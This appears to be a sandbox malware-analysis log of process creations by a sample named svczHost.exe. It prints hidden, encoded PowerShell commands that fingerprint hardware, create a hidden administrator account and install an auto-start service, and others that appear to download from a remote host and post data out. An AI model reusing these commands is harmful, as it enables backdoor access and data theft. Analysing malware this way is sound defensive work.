      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /k "s^t^art /mi^n "" powe^rs^hel^l -w hid^den -n^o^log^o -n^op -e^p by^pass -e^nc^ode^d^com^m^a^n^d "sqbfafgaiaaoafsavabfafgadaauaeuabgbdag8azabjae4azwbdadoaogbvafqarga4ac4arwbfafqauwbuahiaaqbuagcakaaoaekavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataawahaanabvadiadabzae4azwa9ad0aigapackakqapac4aqwbpag4avablae4adaapacka"" && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfafgadaauaeuabgbdag8azabjae4azwbdadoaogbvafqarga4ac4arwbfafqauwbuahiaaqbuagcakaaoaekavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataawahaanabvadiadabzae4azwa9ad0aigapackakqapac4aqwbpag4avablae4adaapacka"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8anwaxagiaywbladkaoqbiadcanqawadiaygaxadkazgbmadiayqawadcaoqawaduayqbiadiazaaxadmamwa5agmanwawadkazgblagiayqayadkazaa3adeamqbiadmanabjagqazaa0adkayqayadgamqbladmanqazadmamaa5adyanaa0agmanqaxadyamwbhagqaywa2agyayga0ageamwaxaduanaa4ageazqawadmayqbladmazqa5adianaaxadkanaazaduaoaa4adeazqblaguaygbladcazga0ageazqaxagmamga2adiangbhadmanabkadcazqbjadiazgbhadcazqbiadgaoabiadyayqbjageanwa3agyamaa4adgaywbkadqazaa0adkaygawadkanqawadqanqbjadiaoaa1admanqbkagyanwawaguanqbhagianqbkadaayqayagianqbiadaaywa4ageazaazaguaoaazagiangbjadgangbiagqayqa5agqanqbkadcamgawaguazga1aduayga1adaaoqbkadqanwazadqayqazadqaoablaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvah
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8anwaxagiaywbladkaoqbiadcanqawadiaygaxadkazgbmadiayqawadcaoqawaduayqbiadiazaaxadmamwa5agmanwawadkazgblagiayqayadkazaa3adeamqbiadmanabjagqazaa0adkayqayadgamqbladmanqazadmamaa5adyanaa0agmanqaxadyamwbhagqaywa2agyayga0ageamwaxaduanaa4ageazqawadmayqbladmazqa5adianaaxadkanaazaduaoaa4adeazqblaguaygbladcazga0ageazqaxagmamga2adiangbhadmanabkadcazqbjadiazgbhadcazqbiadgaoabiadyayqbjageanwa3agyamaa4adgaywbkadqazaa0adkaygawadkanqawadqanqbjadiaoaa1admanqbkagyanwawaguanqbhagianqbkadaayqayagianqbiadaaywa4ageazaazaguaoaazagiangbjadgangbiagqayqa5agqanqbkadcamgawaguazga1aduayga1adaaoqbkadqanwazadqayqazadqaoablaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfafgadaauaeuabgbdag8azabjae4azwbdadoaogbvafqarga4ac4arwbfafqauwbuahiaaqbuagcakaaoaekavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataawahaanabvadiadabzae4azwa9ad0aigapackakqapac4aqwbpag4avablae4adaapacka" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8anwaxagiaywbladkaoqbiadcanqawadiaygaxadkazgbmadiayqawadcaoqawaduayqbiadiazaaxadmamwa5agmanwawadkazgblagiayqayadkazaa3adeamqbiadmanabjagqazaa0adkayqayadgamqbladmanqazadmamaa5adyanaa0agmanqaxadyamwbhagqaywa2agyayga0ageamwaxaduanaa4ageazqawadmayqbladmazqa5adianaaxadkanaazaduaoaa4adeazqblaguaygbladcazga0ageazqaxagmamga2adiangbhadmanabkadcazqbjadiazgbhadcazqbiadgaoabiadyayqbjageanwa3agyamaa4adgaywbkadqazaa0adkaygawadkanqawadqanqbjadiaoaa1admanqbkagyanwawaguanqbhagianqbkadaayqayagianqbiadaaywa4ageazaazaguaoaazagiangbjadgangbiagqayqa5agqanqbkadcamgawaguazga1aduayga1adaaoqbkadqanwazadqayqazadqaoablaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8anwaxagiaywbladkaoqbiadcanqawadiaygaxadkazgbmadiayqawadcaoqawaduayqbiadiazaaxadmamwa5agmanwawadkazgblagiayqayadkazaa3adeamqbiadmanabjagqazaa0adkayqayadgamqbladmanqazadmamaa5adyanaa0agmanqaxadyamwbhagqaywa2agyayga0ageamwaxaduanaa4ageazqawadmayqbladmazqa5adianaaxadkanaazaduaoaa4adeazqblaguaygbladcazga0ageazqaxagmamga2adiangbhadmanabkadcazqbjadiazgbhadcazqbiadgaoabiadyayqbjageanwa3agyamaa4adgaywbkadqazaa0adkaygawadkanqawadqanqbjadiaoaa1admanqbkagyanwawaguanqbhagianqbkadaayqayagianqbiadaaywa4ageazaazaguaoaazagiangbjadgangbiagqayqa5agqanqbkadcamgawaguazga1aduayga1adaaoqbkadqanwazadqayqazadqaoablaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4